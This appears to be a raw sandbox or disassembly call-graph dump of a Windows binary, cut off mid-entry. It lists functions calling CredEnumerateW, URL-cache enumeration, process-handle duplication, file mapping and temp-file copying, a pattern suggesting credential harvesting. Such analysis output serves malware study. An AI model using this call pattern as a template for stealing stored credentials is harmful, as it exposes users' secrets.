API calls 38517->38524 38518->38381 38946 409b98 GetFileAttributesW 38519->38946 38523 40b2cc 27 API calls 38521->38523 38526 445eab 38523->38526 38527 4457a8 38524->38527 38525->38396 38525->38469 38528 409d1f 6 API calls 38526->38528 38529 409d1f 6 API calls 38527->38529 38530 445ebf 38528->38530 38531 4457b8 38529->38531 38532 40ae18 9 API calls 38530->38532 38837 409b98 GetFileAttributesW 38531->38837 38542 445ef5 38532->38542 38534 4457c7 38534->38488 38536 4087b3 338 API calls 38534->38536 38535 40ae51 9 API calls 38535->38542 38536->38488 38537 445f5c 38539 40aebe FindClose 38537->38539 38538 40add4 2 API calls 38538->38542 38539->38498 38540 40b2cc 27 API calls 38540->38542 38541 409d1f 6 API calls 38541->38542 38542->38535 38542->38537 38542->38538 38542->38540 38542->38541 38544 445f3a 38542->38544 38944 409b98 GetFileAttributesW 38542->38944 38945 445093 23 API calls 38544->38945 38546->38348 38547->38350 38548->38348 38549->38343 38551 40c775 38550->38551 38947 40b1ab ??3@YAXPAX ??3@YAXPAX 38551->38947 38553 40c788 38948 40b1ab ??3@YAXPAX ??3@YAXPAX 38553->38948 38555 40c790 38949 40b1ab ??3@YAXPAX ??3@YAXPAX 38555->38949 38557 40c798 38558 40aa04 ??3@YAXPAX 38557->38558 38559 40c7a0 38558->38559 38950 40c274 memset 38559->38950 38564 40a8ab 9 API calls 38565 40c7c3 38564->38565 38566 40a8ab 9 API calls 38565->38566 38567 40c7d0 38566->38567 38979 40c3c3 38567->38979 38571 40c7e5 38572 40c877 38571->38572 38573 40c86c 38571->38573 38579 40c634 49 API calls 38571->38579 39004 40a706 38571->39004 38580 40bdb0 38572->38580 39021 4053fe 39 API calls 38573->39021 38579->38571 39211 404363 38580->39211 38583 40bf5d 39231 40440c 38583->39231 38585 40bdee 38585->38583 38588 40b2cc 27 API calls 38585->38588 38586 40bddf CredEnumerateW 38586->38585 38589 40be02 wcslen 38588->38589 38589->38583 38591 40be1e 38589->38591 38590 40be26 _wcsncoll 38590->38591 38591->38583 38591->38590 38594 40be7d memset 38591->38594 38595 40bea7 memcpy 38591->38595 38596 40bf11 wcschr 38591->38596 38597 40b2cc 27 API calls 38591->38597 38599 40bf43 LocalFree 38591->38599 39234 40bd5d 28 API calls 38591->39234 39235 404423 38591->39235 38594->38591 38594->38595 38595->38591 38595->38596 38596->38591 38598 40bef6 _wcsnicmp 38597->38598 38598->38591 38598->38596 38599->38591 38600 4135f7 39248 4135e0 38600->39248 38603 40b2cc 27 API calls 38604 41360d 38603->38604 38605 40a804 8 API calls 38604->38605 38606 413613 38605->38606 38607 41361b 38606->38607 38608 41363e 38606->38608 38609 40b273 27 API calls 38607->38609 38610 4135e0 FreeLibrary 38608->38610 38611 413625 GetProcAddress 38609->38611 38612 413643 38610->38612 38611->38608 38613 413648 38611->38613 38612->38379 38614 413658 38613->38614 38615 4135e0 FreeLibrary 38613->38615 38614->38379 38616 413666 38615->38616 38616->38379 39251 4449b9 38617->39251 38620 444c1f 38620->38355 38621 4449b9 42 API calls 38623 444b4b 38621->38623 38622 444c15 38624 4449b9 42 API calls 38622->38624 38623->38622 39272 444972 GetVersionExW 38623->39272 38624->38620 38626 444b99 memcmp 38631 444b8c 38626->38631 38627 444c0b 39276 444a85 42 API calls 38627->39276 38631->38626 38631->38627 39273 444aa5 42 API calls 38631->39273 39274 40a7a0 GetVersionExW 38631->39274 39275 444a85 42 API calls 38631->39275 38634 40399d 38633->38634 39277 403a16 38634->39277 38636 403a09 39291 40b1ab ??3@YAXPAX ??3@YAXPAX 38636->39291 38638 4039a3 38638->38636 38642 4039f4 38638->38642 39288 40a02c CreateFileW 38638->39288 38639 403a12 wcsrchr 38639->38367 38642->38636 38643 4099c6 2 API calls 38642->38643 38643->38636 38645 414c2e 16 API calls 38644->38645 38646 404048 38645->38646 38647 414c2e 16 API calls 38646->38647 38648 404056 38647->38648 38649 409d1f 6 API calls 38648->38649 38650 404073 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 40408e 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 4040a6 38653->38654 38655 403af5 20 API calls 38654->38655 38656 4040ba 38655->38656 38657 403af5 20 API calls 38656->38657 38658 4040cb 38657->38658 39318 40414f memset 38658->39318 38660 404140 39332 40b1ab ??3@YAXPAX ??3@YAXPAX 38660->39332 38662 4040ec memset 38665 4040e0 38662->38665 38663 404148 38663->38427 38664 4099c6 2 API calls 38664->38665 38665->38660 38665->38662 38665->38664 38666 40a8ab 9 API calls 38665->38666 38666->38665 39345 40a6e6 WideCharToMultiByte 38667->39345 38669 4087ed 39346 4095d9 memset 38669->39346 38672 408953 38672->38427 38673 408809 memset memset memset memset memset 38674 40b2cc 27 API calls 38673->38674 38675 4088a1 38674->38675 38676 409d1f 6 API calls 38675->38676 38677 4088b1 38676->38677 38678 40b2cc 27 API calls 38677->38678 38679 4088c0 38678->38679 38680 409d1f 6 API calls 38679->38680 38681 4088d0 38680->38681 38682 40b2cc 27 API calls 38681->38682 38683 4088df 38682->38683 38684 409d1f 6 API calls 38683->38684 38685 4088ef 38684->38685 38686 40b2cc 27 API calls 38685->38686 38687 4088fe 38686->38687 38688 409d1f 6 API calls 38687->38688 38689 40890e 38688->38689 38690 40b2cc 27 API calls 38689->38690 38691 40891d 38690->38691 38692 409d1f 6 API calls 38691->38692 38693 40892d 38692->38693 39365 409b98 GetFileAttributesW 38693->39365 38695 40893e 38696 408943 38695->38696 38697 408958 38695->38697 38719 40b633 ??3@YAXPAX 38718->38719 38720 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38719->38720 38721 413f00 Process32NextW 38720->38721 38722 413da5 OpenProcess 38721->38722 38723 413f17 CloseHandle 38721->38723 38724 413df3 memset 38722->38724 38729 413eb0 38722->38729 38723->38464 39681 413f27 38724->39681 38726 413ebf ??3@YAXPAX 38726->38729 38727 4099f4 3 API calls 38727->38729 38729->38721 38729->38726 38729->38727 38730 413e37 GetModuleHandleW 38731 413e1f 38730->38731 38732 413e46 GetProcAddress 38730->38732 38731->38730 39686 413959 38731->39686 39702 413ca4 38731->39702 38732->38731 38734 413ea2 CloseHandle 38734->38729 38736 414c2e 16 API calls 38735->38736 38737 403eb7 38736->38737 38738 414c2e 16 API calls 38737->38738 38739 403ec5 38738->38739 38740 409d1f 6 API calls 38739->38740 38741 403ee2 38740->38741 38742 409d1f 6 API calls 38741->38742 38743 403efd 38742->38743 38744 409d1f 6 API calls 38743->38744 38745 403f15 38744->38745 38746 403af5 20 API calls 38745->38746 38747 403f29 38746->38747 38748 403af5 20 API calls 38747->38748 38749 403f3a 38748->38749 38750 40414f 33 API calls 38749->38750 38755 403f4f 38750->38755 38751 403faf 39716 40b1ab ??3@YAXPAX ??3@YAXPAX 38751->39716 38752 403f5b memset 38752->38755 38754 403fb7 38754->38410 38755->38751 38755->38752 38756 4099c6 2 API calls 38755->38756 38757 40a8ab 9 API calls 38755->38757 38756->38755 38757->38755 38759 414c2e 16 API calls 38758->38759 38760 403d26 38759->38760 38761 414c2e 16 API calls 38760->38761 38762 403d34 38761->38762 38763 409d1f 6 API calls 38762->38763 38764 403d51 38763->38764 38765 409d1f 6 API calls 38764->38765 38766 403d6c 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 403d84 38767->38768 38769 403af5 20 API calls 38768->38769 38770 403d98 38769->38770 38771 403af5 20 API calls 38770->38771 38772 403da9 38771->38772 38773 40414f 33 API calls 38772->38773 38774 403dbe 38773->38774 38775 403e1e 38774->38775 38777 403dca memset 38774->38777 38779 4099c6 2 API calls 38774->38779 38780 40a8ab 9 API calls 38774->38780 39717 40b1ab ??3@YAXPAX ??3@YAXPAX 38775->39717 38777->38774 38778 403e26 38778->38414 38779->38774 38780->38774 38782 414b81 9 API calls 38781->38782 38783 414c40 38782->38783 38784 414c73 memset 38783->38784 39718 409cea 38783->39718 38785 414c94 38784->38785 39721 414592 RegOpenKeyExW 38785->39721 38789 414c64 38789->38405 38790 414cc1 38791 414cf4 wcscpy 38790->38791 39722 414bb0 wcscpy 38790->39722 38791->38789 38793 414cd2 39723 4145ac RegQueryValueExW 38793->39723 38795 414ce9 RegCloseKey 38795->38791 38797 409d62 38796->38797 38798 409d43 wcscpy 38796->38798 38797->38438 38799 409719 2 API calls 38798->38799 38800 409d51 wcscat 38799->38800 38800->38797 38802 40aebe FindClose 38801->38802 38803 40ae21 38802->38803 38804 4099c6 2 API calls 38803->38804 38805 40ae35 38804->38805 38806 409d1f 6 API calls 38805->38806 38807 40ae49 38806->38807 38807->38481 38809 40ade0 38808->38809 38810 40ae0f 38808->38810 38809->38810 38811 40ade7 wcscmp 38809->38811 38810->38481 38811->38810 38812 40adfe wcscmp 38811->38812 38812->38810 38814 40ae18 9 API calls 38813->38814 38816 4453c4 38814->38816 38815 40ae51 9 API calls 38815->38816 38816->38815 38817 4453f3 38816->38817 38818 40add4 2 API calls 38816->38818 38821 445403 253 API calls 38816->38821 38819 40aebe FindClose 38817->38819 38818->38816 38820 4453fe 38819->38820 38820->38481 38821->38816 38823 40ae7b FindNextFileW 38822->38823 38824 40ae5c FindFirstFileW 38822->38824 38825 40ae94 38823->38825 38826 40ae8f 38823->38826 38824->38825 38827 409d1f 6 API calls 38825->38827 38829 40aeb6 38825->38829 38828 40aebe FindClose 38826->38828 38827->38829 38828->38825 38829->38481 38830->38413 38831->38467 38832->38448 38833->38448 38834->38482 38836 409c89 38835->38836 38836->38504 38837->38534 38839 413d39 38838->38839 38840 413d2f FreeLibrary 38838->38840 38841 40b633 ??3@YAXPAX 38839->38841 38840->38839 38842 413d42 38841->38842 38843 40b633 ??3@YAXPAX 38842->38843 38844 413d4a 38843->38844 38844->38362 38845->38365 38846->38416 38847->38430 38849 44db70 38848->38849 38850 40b6fc memset 38849->38850 38851 409c70 2 API calls 38850->38851 38852 40b732 wcsrchr 38851->38852 38853 40b743 38852->38853 38854 40b746 memset 38852->38854 38853->38854 38855 40b2cc 27 API calls 38854->38855 38856 40b76f 38855->38856 38857 409d1f 6 API calls 38856->38857 38858 40b783 38857->38858 39724 409b98 GetFileAttributesW 38858->39724 38860 40b792 38861 40b7c2 38860->38861 38862 409c70 2 API calls 38860->38862 39725 40bb98 38861->39725 38864 40b7a5 38862->38864 38866 40b2cc 27 API calls 38864->38866 38870 40b7b2 38866->38870 38867 40b837 FindCloseChangeNotification 38869 40b83e memset 38867->38869 38868 40b817 39777 409a45 GetTempPathW 38868->39777 39758 40a6e6 WideCharToMultiByte 38869->39758 38873 409d1f 6 API calls 38870->38873 38873->38861 38874 40b827 CopyFileW 38874->38869 38875 40b866 38876 444432 121 API calls 38875->38876 38877 40b879 38876->38877 38878 40bad5 38877->38878 38879 40b273 27 API calls 38877->38879 38880 40baeb 38878->38880 38881 40bade DeleteFileW 38878->38881 38882 40b89a 38879->38882 38883 40b04b ??3@YAXPAX 38880->38883 38881->38880 38884 438552 134 API calls 38882->38884 38885 40baf3 38883->38885 38886 40b8a4 38884->38886 38885->38441 38887 40bacd 38886->38887 38889 4251c4 137 API calls 38886->38889 38888 443d90 111 API calls 38887->38888 38888->38878 38912 40b8b8 38889->38912 38890 40bac6 39784 424f26 123 API calls 38890->39784 38891 40b8bd memset 39759 425413 38891->39759 38894 425413 17 API calls 38894->38912 38897 40a71b MultiByteToWideChar 38897->38912 38898 40a734 MultiByteToWideChar 38898->38912 38899 4253af 17 API calls 38899->38912 38900 4253cf 17 API calls 38900->38912 38901 40b9b5 memcmp 38901->38912 38902 4099c6 2 API calls 38902->38912 38903 404423 37 API calls 38903->38912 38906 40bb3e memset memcpy 39785 40a734 MultiByteToWideChar 38906->39785 38907 4251c4 137 API calls 38907->38912 38909 40bb88 LocalFree 38909->38912 38912->38890 38912->38891 38912->38894 38912->38897 38912->38898 38912->38899 38912->38900 38912->38901 38912->38902 38912->38903 38912->38906 38912->38907 38913 40ba5f memcmp 38912->38913 38914 4099f4 3 API calls 38912->38914 39766 4253ef 38912->39766 39771 40b64c 38912->39771 39780 447280 memset 38912->39780 39781 447960 memset memcpy memcpy memcpy 38912->39781 39782 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38912->39782 39783 447920 memcpy memcpy memcpy 38912->39783 38913->38912 38914->38912 38915->38443 38917 40aed1 38916->38917 38918 40aec7 FindClose 38916->38918 38917->38375 38918->38917 38920 4099d7 38919->38920 38921 4099da memcpy 38919->38921 38920->38921 38921->38426 38923 40b2cc 27 API calls 38922->38923 38924 44543f 38923->38924 38925 409d1f 6 API calls 38924->38925 38926 44544f 38925->38926 39878 409b98 GetFileAttributesW 38926->39878 38928 44545e 38929 445476 38928->38929 38930 40b6ef 252 API calls 38928->38930 38931 40b2cc 27 API calls 38929->38931 38930->38929 38932 445482 38931->38932 38933 409d1f 6 API calls 38932->38933 38934 445492 38933->38934 39879 409b98 GetFileAttributesW 38934->39879 38936 4454a1 38937 4454b9 38936->38937 38938 40b6ef 252 API calls 38936->38938 38937->38456 38938->38937 38939->38455 38940->38472 38941->38478 38942->38515 38943->38493 38944->38542 38945->38542 38946->38525 38947->38553 38948->38555 38949->38557 38951 414c2e 16 API calls 38950->38951 38952 40c2ae 38951->38952 39022 40c1d3 38952->39022 38957 40c3be 38974 40a8ab 38957->38974 38958 40afcf 2 API calls 38959 40c2fd FindFirstUrlCacheEntryW 38958->38959 38960 40c3b6 38959->38960 38961 40c31e wcschr 38959->38961 38962 40b04b ??3@YAXPAX 38960->38962 38963 40c331 38961->38963 38964 40c35e FindNextUrlCacheEntryW 38961->38964 38962->38957 38965 40a8ab 9 API calls 38963->38965 38964->38961 38966 40c373 GetLastError 38964->38966 38969 40c33e wcschr 38965->38969 38967 40c3ad FindCloseUrlCache 38966->38967 38968 40c37e 38966->38968 38967->38960 38970 40afcf 2 API calls 38968->38970 38969->38964 38971 40c34f 38969->38971 38972 40c391 FindNextUrlCacheEntryW 38970->38972 38973 40a8ab 9 API calls 38971->38973 38972->38961 38972->38967 38973->38964 39138 40a97a 38974->39138 38977 40a8cc 38977->38564 38978 40a8d0 7 API calls 38978->38977 39143 40b1ab ??3@YAXPAX ??3@YAXPAX 38979->39143 38981 40c3dd 38982 40b2cc 27 API calls 38981->38982 38983 40c3e7 38982->38983 39144 414592 RegOpenKeyExW 38983->39144 38985 40c3f4 38986 40c50e 38985->38986 38987 40c3ff 38985->38987 39001 405337 38986->39001 38988 40a9ce 4 API calls 38987->38988 38989 40c418 memset 38988->38989 39145 40aa1d 38989->39145 38992 40c471 38994 40c47a _wcsupr 38992->38994 38993 40c505 RegCloseKey 38993->38986 38995 40a8d0 7 API calls 38994->38995 38996 40c498 38995->38996 38997 40a8d0 7 API calls 38996->38997 38998 40c4ac memset 38997->38998 38999 40aa1d 38998->38999 39000 40c4e4 RegEnumValueW 38999->39000 39000->38993 39000->38994 39147 405220 39001->39147 39005 4099c6 2 API calls 39004->39005 39006 40a714 _wcslwr 39005->39006 39007 40c634 39006->39007 39204 405361 39007->39204 39010 40c65c wcslen 39207 4053b6 39 API calls 39010->39207 39011 40c71d wcslen 39011->38571 39013 40c677 39014 40c713 39013->39014 39208 40538b 39 API calls 39013->39208 39210 4053df 39 API calls 39014->39210 39017 40c6a5 39017->39014 39018 40c6a9 memset 39017->39018 39019 40c6d3 39018->39019 39209 40c589 43 API calls 39019->39209 39021->38572 39023 40ae18 9 API calls 39022->39023 39029 40c210 39023->39029 39024 40ae51 9 API calls 39024->39029 39025 40c264 39026 40aebe FindClose 39025->39026 39028 40c26f 39026->39028 39027 40add4 2 API calls 39027->39029 39034 40e5ed memset memset 39028->39034 39029->39024 39029->39025 39029->39027 39030 40c231 _wcsicmp 39029->39030 39031 40c1d3 35 API calls 39029->39031 39030->39029 39032 40c248 39030->39032 39031->39029 39047 40c084 22 API calls 39032->39047 39035 414c2e 16 API calls 39034->39035 39036 40e63f 39035->39036 39037 409d1f 6 API calls 39036->39037 39038 40e658 39037->39038 39048 409b98 GetFileAttributesW 39038->39048 39040 40e667 39041 409d1f 6 API calls 39040->39041 39043 40e680 39040->39043 39041->39043 39049 409b98 GetFileAttributesW 39043->39049 39044 40e68f 39045 40c2d8 39044->39045 39050 40e4b2 39044->39050 39045->38957 39045->38958 39047->39029 39048->39040 39049->39044 39071 40e01e 39050->39071 39052 40e593 39053 40e5b0 39052->39053 39054 40e59c DeleteFileW 39052->39054 39055 40b04b ??3@YAXPAX 39053->39055 39054->39053 39057 40e5bb 39055->39057 39056 40e521 39056->39052 39094 40e175 39056->39094 39059 40e5c4 CloseHandle 39057->39059 39060 40e5cc 39057->39060 39059->39060 39062 40b633 ??3@YAXPAX 39060->39062 39061 40e573 39063 40e584 39061->39063 39064 40e57c FindCloseChangeNotification 39061->39064 39065 40e5db 39062->39065 39137 40b1ab ??3@YAXPAX ??3@YAXPAX 39063->39137 39064->39063 39068 40b633 ??3@YAXPAX 39065->39068 39067 40e540 39067->39061 39114 40e2ab 39067->39114 39069 40e5e3 39068->39069 39069->39045 39072 406214 22 API calls 39071->39072 39073 40e03c 39072->39073 39074 40e16b 39073->39074 39075 40dd85 74 API calls 39073->39075 39074->39056 39076 40e06b 39075->39076 39076->39074 39077 40afcf ??2@YAPAXI ??3@YAXPAX 39076->39077 39078 40e08d OpenProcess 39077->39078 39079 40e0a4 GetCurrentProcess DuplicateHandle 39078->39079 39083 40e152 39078->39083 39080 40e0d0 GetFileSize 39079->39080 39081 40e14a CloseHandle 39079->39081 39084 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39080->39084 39081->39083 39082 40e160 39086 40b04b ??3@YAXPAX 39082->39086 39083->39082 39085 406214 22 API calls 39083->39085 39087 40e0ea 39084->39087 39085->39082 39086->39074 39088 4096dc CreateFileW 39087->39088 39089 40e0f1 CreateFileMappingW 39088->39089 39090 40e140 CloseHandle CloseHandle 39089->39090 39091 40e10b MapViewOfFile 39089->39091 39090->39081 39092 40e13b FindCloseChangeNotification 39091->39092 39093 40e11f WriteFile UnmapViewOfFile 39091->39093 39092->39090 39093->39092 39095 40e18c 39094->39095 39096 406b90 11 API calls 39095->39096 39097 40e19f 39096->39097 39098 40e1a7 memset 39097->39098 39099 40e299 39097->39099 39104 40e1e8 39098->39104 39100 4069a3 ??3@YAXPAX ??3@YAXPAX 39099->39100 39101 40e2a4 39100->39101 39101->39067 39102 406e8f 13 API calls 39102->39104 39103 406b53 SetFilePointerEx ReadFile 39103->39104 39104->39102 39104->39103 39105 40e283 39104->39105 39106 40dd50 _wcsicmp 39104->39106 39110 40742e 8 API calls 39104->39110 39111 40aae3 wcslen wcslen _memicmp 39104->39111 39112 40e244 _snwprintf 39104->39112 39107 40e291 39105->39107 39108 40e288 ??3@YAXPAX 39105->39108 39106->39104 39109 40aa04 ??3@YAXPAX 39107->39109 39108->39107 39109->39099 39110->39104 39111->39104 39113 40a8d0 7 API calls 39112->39113 39113->39104 39115 40e2c2 39114->39115 39116 406b90 11 API calls 39115->39116 39127 40e2d3 39116->39127 39117 40e4a0 39118 4069a3 ??3@YAXPAX ??3@YAXPAX 39117->39118 39120 40e4ab 39118->39120 39119 406e8f 13 API calls 39119->39127 39120->39067 39121 406b53 SetFilePointerEx ReadFile 39121->39127 39122 40e489 39123 40aa04 ??3@YAXPAX 39122->39123 39125 40e491 39123->39125 39124 40dd50 _wcsicmp 39124->39127 39125->39117 39126 40e497 ??3@YAXPAX 39125->39126 39126->39117 39127->39117 39127->39119 39127->39121 39127->39122 39127->39124 39128 40dd50 _wcsicmp 39127->39128 39131 40742e 8 API calls 39127->39131 39132 40e3e0 memcpy 39127->39132 39133 40e3b3 wcschr 39127->39133 39134 40e3fb memcpy 39127->39134 39135 40e416 memcpy 39127->39135 39136 40e431 memcpy 39127->39136 39129 40e376 memset 39128->39129 39130 40aa29 6 API calls 39129->39130 39130->39127 39131->39127 39132->39127 39133->39127 39134->39127 39135->39127 39136->39127 39137->39052 39140 40a980 39138->39140 39139 40a8bb 39139->38977 39139->38978 39140->39139 39141 40a995 _wcsicmp 39140->39141 39142 40a99c wcscmp 39140->39142 39141->39140 39142->39140 39143->38981 39144->38985 39146 40aa23 RegEnumValueW 39145->39146 39146->38992 39146->38993 39148 405335 39147->39148 39149 40522a 39147->39149 39148->38571 39150 40b2cc 27 API calls 39149->39150 39151 405234 39150->39151 39152 40a804 8 API calls 39151->39152 39153 40523a 39152->39153 39192 40b273 39153->39192 39155 405248 _mbscpy _mbscat GetProcAddress 39156 40b273 27 API calls 39155->39156 39157 405279 39156->39157 39195 405211 GetProcAddress 39157->39195 39159 405282 39160 40b273 27 API calls 39159->39160 39161 40528f 39160->39161 39196 405211 GetProcAddress 39161->39196 39163 405298 39164 40b273 27 API calls 39163->39164 39165 4052a5 39164->39165 39197 405211 GetProcAddress 39165->39197 39167 4052ae 39168 40b273 27 API calls 39167->39168 39169 4052bb 39168->39169 39198 405211 GetProcAddress 39169->39198 39171 4052c4 39172 40b273 27 API calls 39171->39172 39173 4052d1 39172->39173 39199 405211 GetProcAddress 39173->39199 39175 4052da 39176 40b273 27 API calls 39175->39176 39177 4052e7 39176->39177 39200 405211 GetProcAddress 39177->39200 39179 4052f0 39180 40b273 27 API calls 39179->39180 39181 4052fd 39180->39181 39201 405211 GetProcAddress 39181->39201 39183 405306 39184 40b273 27 API calls 39183->39184 39185 405313 39184->39185 39202 405211 GetProcAddress 39185->39202 39187 40531c 39188 40b273 27 API calls 39187->39188 39189 405329 39188->39189 39203 405211 GetProcAddress 39189->39203 39191 405332 39191->39148 39193 40b58d 27 API calls 39192->39193 39194 40b18c 39193->39194 39194->39155 39195->39159 39196->39163 39197->39167 39198->39171 39199->39175 39200->39179 39201->39183 39202->39187 39203->39191 39205 405220 39 API calls 39204->39205 39206 405369 39205->39206 39206->39010 39206->39011 39207->39013 39208->39017 39209->39014 39210->39011 39212 40440c FreeLibrary 39211->39212 39213 40436d 39212->39213 39214 40a804 8 API calls 39213->39214 39215 404377 39214->39215 39216 404383 39215->39216 39217 404405 39215->39217 39218 40b273 27 API calls 39216->39218 39217->38583 39217->38585 39217->38586 39219 40438d GetProcAddress 39218->39219 39220 40b273 27 API calls 39219->39220 39221 4043a7 GetProcAddress 39220->39221 39222 40b273 27 API calls 39221->39222 39223 4043ba GetProcAddress 39222->39223 39224 40b273 27 API calls 39223->39224 39225 4043ce GetProcAddress 39224->39225 39226 40b273 27 API calls 39225->39226 39227 4043e2 GetProcAddress 39226->39227 39228 4043f1 39227->39228 39229 4043f7 39228->39229 39230 40440c FreeLibrary 39228->39230 39229->39217 39230->39217 39232 404413 FreeLibrary 39231->39232 39233 40441e 39231->39233 39232->39233 39233->38600 39234->38591 39236 40447e 39235->39236 39237 40442e 39235->39237 39236->38591 39238 40b2cc 27 API calls 39237->39238 39239 404438 39238->39239 39240 40a804 8 API calls 39239->39240 39241 40443e 39240->39241 39242 404445 39241->39242 39243 404467 39241->39243 39244 40b273 27 API calls 39242->39244 39243->39236 39245 404475 FreeLibrary 39243->39245 39246 40444f GetProcAddress 39244->39246 39245->39236 39246->39243 39247 404460 39246->39247 39247->39243 39249 4135f6 39248->39249 39250 4135eb FreeLibrary 39248->39250 39249->38603 39250->39249 39252 4449c4 39251->39252 39253 444a52 39251->39253 39254 40b2cc 27 API calls 39252->39254 39253->38620 39253->38621 39255 4449cb 39254->39255 39256 40a804 8 API calls 39255->39256 39257 4449d1 39256->39257 39258 40b273 27 API calls 39257->39258 39259 4449dc GetProcAddress 39258->39259 39260 40b273 27 API calls 39259->39260 39261 4449f3 GetProcAddress 39260->39261 39262 40b273 27 API calls 39261->39262 39263 444a04 GetProcAddress 39262->39263 39264 40b273 27 API calls 39263->39264 39265 444a15 GetProcAddress 39264->39265 39266 40b273 27 API calls 39265->39266 39267 444a26 GetProcAddress 39266->39267 39268 40b273 27 API calls 39267->39268 39269 444a37 GetProcAddress 39268->39269 39270 40b273 27 API calls 39269->39270 39271 444a48 GetProcAddress 39270->39271 39271->39253 39272->38631 39273->38631 39274->38631 39275->38631 39276->38622 39278 403a29 39277->39278 39292 403bed memset memset 39278->39292 39280 403ae7 39305 40b1ab ??3@YAXPAX ??3@YAXPAX 39280->39305 39281 403a3f memset 39287 403a2f 39281->39287 39283 403aef 39283->38638 39284 409b98 GetFileAttributesW 39284->39287 39285 40a8d0 7 API calls 39285->39287 39286 409d1f 6 API calls 39286->39287 39287->39280 39287->39281 39287->39284 39287->39285 39287->39286 39289 40a051 GetFileTime FindCloseChangeNotification 39288->39289 39290 4039ca CompareFileTime 39288->39290 39289->39290 39290->38638 39291->38639 39293 414c2e 16 API calls 39292->39293 39294 403c38 39293->39294 39295 409719 2 API calls 39294->39295 39296 403c3f wcscat 39295->39296 39297 414c2e 16 API calls 39296->39297 39298 403c61 39297->39298 39299 409719 2 API calls 39298->39299 39300 403c68 wcscat 39299->39300 39306 403af5 39300->39306 39303 403af5 20 API calls 39304 403c95 39303->39304 39304->39287 39305->39283 39307 403b02 39306->39307 39308 40ae18 9 API calls 39307->39308 39316 403b37 39308->39316 39309 403bdb 39311 40aebe FindClose 39309->39311 39310 40add4 wcscmp wcscmp 39310->39316 39312 403be6 39311->39312 39312->39303 39313 40ae18 9 API calls 39313->39316 39314 40ae51 9 API calls 39314->39316 39315 40aebe FindClose 39315->39316 39316->39309 39316->39310 39316->39313 39316->39314 39316->39315 39317 40a8d0 7 API calls 39316->39317 39317->39316 39319 409d1f 6 API calls 39318->39319 39320 404190 39319->39320 39333 409b98 GetFileAttributesW 39320->39333 39322 40419c 39323 4041a7 6 API calls 39322->39323 39324 40435c 39322->39324 39325 40424f 39323->39325 39324->38665 39325->39324 39327 40425e memset 39325->39327 39329 409d1f 6 API calls 39325->39329 39330 40a8ab 9 API calls 39325->39330 39334 414842 39325->39334 39327->39325 39328 404296 wcscpy 39327->39328 39328->39325 39329->39325 39331 4042b6 memset memset _snwprintf wcscpy 39330->39331 39331->39325 39332->38663 39333->39322 39337 41443e 39334->39337 39336 414866 39336->39325 39338 41444b 39337->39338 39339 414451 39338->39339 39340 4144a3 GetPrivateProfileStringW 39338->39340 39341 414491 39339->39341 39342 414455 wcschr 39339->39342 39340->39336 39344 414495 WritePrivateProfileStringW 39341->39344 39342->39341 39343 414463 _snwprintf 39342->39343 39343->39344 39344->39336 39345->38669 39347 40b2cc 27 API calls 39346->39347 39348 409615 39347->39348 39349 409d1f 6 API calls 39348->39349 39350 409625 39349->39350 39375 409b98 GetFileAttributesW 39350->39375 39352 409634 39353 409648 39352->39353 39376 4091b8 memset 39352->39376 39355 40b2cc 27 API calls 39353->39355 39357 408801 39353->39357 39356 40965d 39355->39356 39358 409d1f 6 API calls 39356->39358 39357->38672 39357->38673 39359 40966d 39358->39359 39428 409b98 GetFileAttributesW 39359->39428 39361 40967c 39361->39357 39362 409681 39361->39362 39429 409529 72 API calls 39362->39429 39364 409690 39364->39357 39365->38695 39375->39352 39430 40a6e6 WideCharToMultiByte 39376->39430 39378 409202 39431 444432 39378->39431 39381 40b273 27 API calls 39382 409236 39381->39382 39477 438552 39382->39477 39385 409383 39387 40b273 27 API calls 39385->39387 39389 409399 39387->39389 39391 438552 134 API calls 39389->39391 39409 4093a3 39391->39409 39395 4094ff 39480 443d90 39395->39480 39398 4251c4 137 API calls 39398->39409 39400 409507 39408 40951d 39400->39408 39402 4093df 39533 424f26 123 API calls 39402->39533 39406 4253cf 17 API calls 39406->39409 39408->39353 39409->39395 39409->39398 39409->39402 39409->39406 39411 4093e4 39409->39411 39415 4253af 17 API calls 39411->39415 39418 4093ed 39415->39418 39420 4253af 17 API calls 39418->39420 39428->39361 39429->39364 39430->39378 39432 4438b5 11 API calls 39431->39432 39433 44444c 39432->39433 39439 409215 39433->39439 39535 415a6d 39433->39535 39435 4442e6 11 API calls 39437 44469e 39435->39437 39436 444486 39438 4444b9 memcpy 39436->39438 39476 4444a4 39436->39476 39437->39439 39441 443d90 111 API calls 39437->39441 39539 415258 39438->39539 39439->39381 39439->39408 39441->39439 39442 444524 39443 444541 39442->39443 39444 44452a 39442->39444 39542 444316 39443->39542 39445 416935 16 API calls 39444->39445 39445->39476 39448 444316 18 API calls 39449 444563 39448->39449 39450 444316 18 API calls 39449->39450 39451 44456f 39450->39451 39452 444316 18 API calls 39451->39452 39476->39435 39609 438460 39477->39609 39479 409240 39479->39385 39500 4251c4 39479->39500 39481 443da3 39480->39481 39482 443db6 39480->39482 39621 41707a 39481->39621 39482->39400 39637 424f07 39500->39637 39502 4251e4 39503 4251f7 39502->39503 39504 4251e8 39502->39504 39645 4250f8 39503->39645 39644 4446ea 11 API calls 39504->39644 39506 4251f2 39533->39395 39536 415a77 39535->39536 39537 415a8d 39536->39537 39538 415a7e memset 39536->39538 39537->39436 39538->39537 39540 4438b5 11 API calls 39539->39540 39541 41525d 39540->39541 39541->39442 39543 444328 39542->39543 39544 444423 39543->39544 39545 44434e 39543->39545 39547 4446ea 11 API calls 39544->39547 39546 432d4e memset memset memcpy 39545->39546 39548 44435a 39546->39548 39553 444381 39547->39553 39550 444375 39548->39550 39555 44438b 39548->39555 39549 432d4e memset memset memcpy 39551 4443ec 39549->39551 39552 416935 16 API calls 39550->39552 39551->39553 39554 416935 16 API calls 39551->39554 39552->39553 39553->39448 39554->39553 39555->39549 39610 41703f 11 API calls 39609->39610 39611 43847a 39610->39611 39612 43848a 39611->39612 39613 43847e 39611->39613 39615 438270 134 API calls 39612->39615 39614 4446ea 11 API calls 39613->39614 39617 438488 39614->39617 39616 4384aa 39615->39616 39616->39617 39618 424f26 123 API calls 39616->39618 39617->39479 39619 4384bb 39618->39619 39620 438270 134 API calls 39619->39620 39620->39617 39638 424f1f 39637->39638 39639 424f0c 39637->39639 39641 424eea 11 API calls 39638->39641 39640 416760 11 